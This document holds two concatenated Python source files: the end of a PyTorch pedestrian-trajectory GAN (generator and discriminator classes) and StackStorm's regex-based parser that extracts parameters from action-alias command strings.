self.decoder = Decoder(
pred_len,
embedding_dim=embedding_dim,
h_dim=decoder_h_dim,
mlp_dim=mlp_dim,
num_layers=num_layers,
pool_every_timestep=pool_every_timestep,
dropout=dropout,
bottleneck_dim=bottleneck_dim,
activation=activation,
batch_norm=batch_norm,
pooling_type=pooling_type,
grid_size=grid_size,
neighborhood_size=neighborhood_size
)
if pooling_type == 'pool_net':
self.pool_net = PoolHiddenNet(
embedding_dim=self.embedding_dim,
h_dim=encoder_h_dim,
mlp_dim=mlp_dim,
bottleneck_dim=bottleneck_dim,
activation=activation,
batch_norm=batch_norm
)
elif pooling_type == 'spool':
self.pool_net = SocialPooling(
h_dim=encoder_h_dim,
activation=activation,
batch_norm=batch_norm,
dropout=dropout,
neighborhood_size=neighborhood_size,
grid_size=grid_size
)
if self.noise_dim == None or self.noise_dim[0] == 0:
self.noise_dim = None
else:
self.noise_first_dim = noise_dim[0]
# Decoder Hidden
if pooling_type:
input_dim = encoder_h_dim + bottleneck_dim
else:
input_dim = encoder_h_dim
# if self.mlp_decoder_needed():
# mlp_decoder_context_dims = [
# input_dim, mlp_dim, decoder_h_dim - self.noise_first_dim
# ]
if self.mlp_decoder_needed():
mlp_decoder_context_dims = [
input_dim, decoder_h_dim - self.noise_first_dim
]
self.mlp_decoder_context = make_mlp(
mlp_decoder_context_dims,
activation=activation,
batch_norm=batch_norm,
dropout=dropout
)
def add_noise(self, _input, seq_start_end, user_noise=None):
"""
Inputs:
- _input: Tensor of shape (_, decoder_h_dim - noise_first_dim)
- seq_start_end: A list of tuples which delimit sequences within batch.
- user_noise: Generally used for inference when you want to see
relation between different types of noise and outputs.
Outputs:
- decoder_h: Tensor of shape (_, decoder_h_dim)
"""
if not self.noise_dim:
return _input
if self.noise_mix_type == 'global':
noise_shape = (seq_start_end.size(0), ) + self.noise_dim
else:
noise_shape = (_input.size(0), ) + self.noise_dim
if user_noise is not None:
z_decoder = user_noise
else:
z_decoder = get_noise(noise_shape, self.noise_type)
if self.noise_mix_type == 'global':
_list = []
for idx, (start, end) in enumerate(seq_start_end):
start = start.item()
end = end.item()
_vec = z_decoder[idx].view(1, -1)
_to_cat = _vec.repeat(end - start, 1)
_list.append(torch.cat([_input[start:end], _to_cat], dim=1))
decoder_h = torch.cat(_list, dim=0)
return decoder_h
decoder_h = torch.cat([_input, z_decoder], dim=1)
return decoder_h
def mlp_decoder_needed(self):
if (
self.noise_dim or self.pooling_type or
self.encoder_h_dim != self.decoder_h_dim
):
return True
else:
return False
def forward(self, obs_traj, obs_traj_rel, seq_start_end, user_noise=None):
"""
Inputs:
- obs_traj: Tensor of shape (obs_len, batch, 2)
- obs_traj_rel: Tensor of shape (obs_len, batch, 2)
- seq_start_end: A list of tuples which delimit sequences within batch.
- user_noise: Generally used for inference when you want to see
relation between different types of noise and outputs.
Output:
- pred_traj_rel: Tensor of shape (self.pred_len, batch, 2)
"""
batch = obs_traj_rel.size(1)
obs_len = obs_traj_rel.size(0)
# Encode seq
final_encoder_h = self.encoder(obs_traj_rel)
# Pool States
# if self.pooling_type:
# end_pos = obs_traj[-1, :, :]
# pool_h = self.pool_net(final_encoder_h, seq_start_end, end_pos)
# # Construct input hidden states for decoder
# mlp_decoder_context_input = torch.cat(
# [final_encoder_h.view(-1, self.encoder_h_dim), pool_h], dim=1)
# else:
# mlp_decoder_context_input = final_encoder_h.view(
# -1, self.encoder_h_dim)
mlp_decoder_context_input = final_encoder_h.view(-1, self.encoder_h_dim)
# Add Noise
# if self.mlp_decoder_needed():
noise_input = self.mlp_decoder_context(mlp_decoder_context_input)
# else:
# noise_input = mlp_decoder_context_input
noise_output = self.add_noise(
noise_input, seq_start_end, user_noise=user_noise)
# decoder_h = torch.unsqueeze(decoder_h, 0)
# decoder_c = torch.zeros(
# self.num_layers, batch, self.decoder_h_dim
# ).cuda()
# state_tuple = (decoder_h, decoder_c)
last_pos = obs_traj[-1]
last_pos_rel = obs_traj_rel[-1]
# Predict Trajectory
decoder_out = self.decoder(
last_pos,
last_pos_rel,
noise_output,
seq_start_end,
)
pred_traj_fake_rel = decoder_out.permute(1, 0, 2)
return pred_traj_fake_rel
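# Shape sketch for TrajectoryGenerator (kept as comments because get_noise()
# calls .cuda(), so running it assumes a GPU; the sizes below are arbitrary):
#
#   obs_len, pred_len, batch = 8, 8, 64
#   g = TrajectoryGenerator(obs_len, pred_len, noise_dim=(8,)).cuda()
#   obs_traj      = torch.randn(obs_len, batch, 2).cuda()  # absolute positions
#   obs_traj_rel  = torch.randn(obs_len, batch, 2).cuda()  # relative displacements
#   seq_start_end = torch.tensor([[0, batch]]).cuda()      # one scene with all peds
#   pred_rel = g(obs_traj, obs_traj_rel, seq_start_end)    # -> (pred_len, batch, 2)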
class TrajectoryDiscriminator(nn.Module):
def __init__(
self, obs_len, pred_len, embedding_dim=64, h_dim=64, mlp_dim=1024,
num_layers=1, activation='relu', batch_norm=True, dropout=0.0,
d_type='local'
):
super(TrajectoryDiscriminator, self).__init__()
self.obs_len = obs_len
self.pred_len = pred_len
self.seq_len = obs_len + pred_len
self.mlp_dim = mlp_dim
self.h_dim = h_dim
self.d_type = d_type
self.encoder = Encoder(
embedding_dim=embedding_dim,
h_dim=h_dim,
mlp_dim=mlp_dim,
num_layers=num_layers,
dropout=dropout
)
# real_classifier_dims = [h_dim, mlp_dim, 1]
# self.real_classifier = make_mlp(
# real_classifier_dims,
# activation=activation,
# batch_norm=batch_norm,
# dropout=dropout
# )
# if d_type == 'global':
# mlp_pool_dims = [h_dim + embedding_dim, mlp_dim, h_dim]
# self.pool_net = PoolHiddenNet(
# embedding_dim=embedding_dim,
# h_dim=h_dim,
# mlp_dim=mlp_pool_dims,
# bottleneck_dim=h_dim,
# activation=activation,
# batch_norm=batch_norm
# )
real_classifier_dims = [(obs_len + pred_len) * 2, 16, 8, 1]
self.real_classifier = make_mlp(
real_classifier_dims,
activation=activation,
batch_norm=batch_norm,
dropout=dropout
)
# def forward(self, traj, traj_rel, seq_start_end=None):
# """
# Inputs:
# - traj: Tensor of shape (obs_len + pred_len, batch, 2)
# - traj_rel: Tensor of shape (obs_len + pred_len, batch, 2)
# - seq_start_end: A list of tuples which delimit sequences within batch
# Output:
# - scores: Tensor of shape (batch,) with real/fake scores
# """
# final_h = self.encoder(traj_rel)
# # Note: In case of 'global' option we are using start_pos as opposed to
    # # end_pos. The intuition being that hidden state has the whole
# # trajectory and relative postion at the start when combined with
# # trajectory information should help in discriminative behavior.
# if self.d_type == 'local':
# classifier_input = final_h.squeeze()
# else:
# classifier_input = self.pool_net(
# final_h.squeeze(), seq_start_end, traj[0]
# )
# scores = self.real_classifier(classifier_input)
# return scores
def forward(self, traj, traj_rel, seq_start_end=None):
"""
Inputs:
- traj: Tensor of shape (obs_len + pred_len, batch, 2)
- traj_rel: Tensor of shape (obs_len + pred_len, batch, 2)
- seq_start_end: A list of tuples which delimit sequences within batch
Output:
- scores: Tensor of shape (batch,) with real/fake scores
"""
batch = traj_rel.shape[1]
traj_rel = traj_rel.permute(1, 0, 2)
classifier_input = traj_rel.contiguous().view(batch, -1)
scores = self.real_classifier(classifier_input)
        return scores
|
py | 1a4bc3e41ef3abb343ff1b935afe3914ec2b0c83 | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from st2common.exceptions.content import ParseException
__all__ = [
'ActionAliasFormatParser',
'extract_parameters_for_action_alias_db',
'extract_parameters',
]
class ActionAliasFormatParser(object):
def __init__(self, alias_format=None, param_stream=None):
self._format = alias_format or ''
self._param_stream = param_stream or ''
def get_extracted_param_value(self):
"""
        Match command against the format string and extract parameters from the command string.
:rtype: ``dict``
"""
result = {}
param_stream = self._param_stream
# As there's a lot of questions about using regular expressions,
# I'll try to be thorough when documenting this code.
# I'll split the whole convoluted regex into snippets to make it
# a bit more readable (hopefully).
snippets = dict()
# Formats for keys and values: key is a non-spaced string,
# value is anything in quotes or curly braces, or a single word.
snippets['key'] = r'\s*(\S+?)\s*'
snippets['value'] = r'""|\'\'|"(.+?)"|\'(.+?)\'|({.+?})|(\S+)'
# Extended value: also matches unquoted text (caution).
snippets['ext_value'] = r'""|\'\'|"(.+?)"|\'(.+?)\'|({.+?})|(.+?)'
# Key-value pair:
snippets['pairs'] = r'(?:^|\s+){key}=({value})'.format(**snippets)
# End of string: multiple space-separated key-value pairs:
snippets['ending'] = r'.*?(({pairs}\s*)*)$'.format(**snippets)
# Default value in optional parameters:
snippets['default'] = r'\s*=\s*(?:{ext_value})\s*'.format(**snippets)
# Optional parameter (has a default value):
snippets['optional'] = '{{' + snippets['key'] + snippets['default'] + '}}'
# Required parameter (no default value):
snippets['required'] = '{{' + snippets['key'] + '}}'
# 1. Matching the arbitrary key-value pairs at the end of the command
# to support extra parameters (not specified in the format string),
# and cutting them from the command string afterwards.
ending_pairs = re.match(snippets['ending'], param_stream, re.DOTALL)
has_ending_pairs = ending_pairs and ending_pairs.group(1)
if has_ending_pairs:
kv_pairs = re.findall(snippets['pairs'], ending_pairs.group(1), re.DOTALL)
param_stream = param_stream.replace(ending_pairs.group(1), '')
param_stream = " %s " % (param_stream)
# 2. Matching optional parameters (with default values).
optional = re.findall(snippets['optional'], self._format, re.DOTALL)
# Transforming our format string into a regular expression,
# substituting {{ ... }} with regex named groups, so that param_stream
# matched against this expression yields a dict of params with values.
param_match = r'\1["\']?(?P<\2>(?:(?<=\').+?(?=\')|(?<=").+?(?=")|{.+?}|.+?))["\']?'
reg = re.sub(r'(\s*)' + snippets['optional'], r'(?:' + param_match + r')?', self._format)
reg = re.sub(r'(\s*)' + snippets['required'], param_match, reg)
        reg = r'^\s*' + reg + r'\s*$'
# 3. Matching the command against our regex to get the param values
matched_stream = re.match(reg, param_stream, re.DOTALL)
if not matched_stream:
# If no match is found we throw since this indicates provided user string (command)
# didn't match the provided format string
raise ParseException('Command "%s" doesn\'t match format string "%s"' %
(self._param_stream, self._format))
# Compiling results from the steps 1-3.
if matched_stream:
result = matched_stream.groupdict()
for param in optional:
matched_value = result[param[0]] if matched_stream else None
matched_result = matched_value or ''.join(param[1:])
if matched_result is not None:
result[param[0]] = matched_result
if has_ending_pairs:
for pair in kv_pairs:
result[pair[0]] = ''.join(pair[2:])
if self._format and not (self._param_stream.strip() or any(result.values())):
raise ParseException('No value supplied and no default value found.')
return result
def extract_parameters_for_action_alias_db(action_alias_db, format_str, param_stream):
"""
Extract parameters from the user input based on the provided format string.
Note: This function makes sure that the provided format string is indeed available in the
action_alias_db.formats.
"""
    formats = action_alias_db.get_format_strings()
if format_str not in formats:
raise ValueError('Format string "%s" is not available on the alias "%s"' %
(format_str, action_alias_db.name))
result = extract_parameters(format_str=format_str, param_stream=param_stream)
return result
def extract_parameters(format_str, param_stream):
parser = ActionAliasFormatParser(alias_format=format_str, param_stream=param_stream)
return parser.get_extracted_param_value()
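if __name__ == '__main__':
    # A quick illustration of the parser above; the format and command strings
    # are made up, and running this file directly assumes st2common is importable.
    example_format = 'run {{cmd}} on {{hosts}} {{user=root}}'
    example_command = 'run "uptime" on web1 user=admin'
    print(extract_parameters(format_str=example_format, param_stream=example_command))
    # Expected, given the regexes above: {'cmd': 'uptime', 'hosts': 'web1', 'user': 'admin'}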
|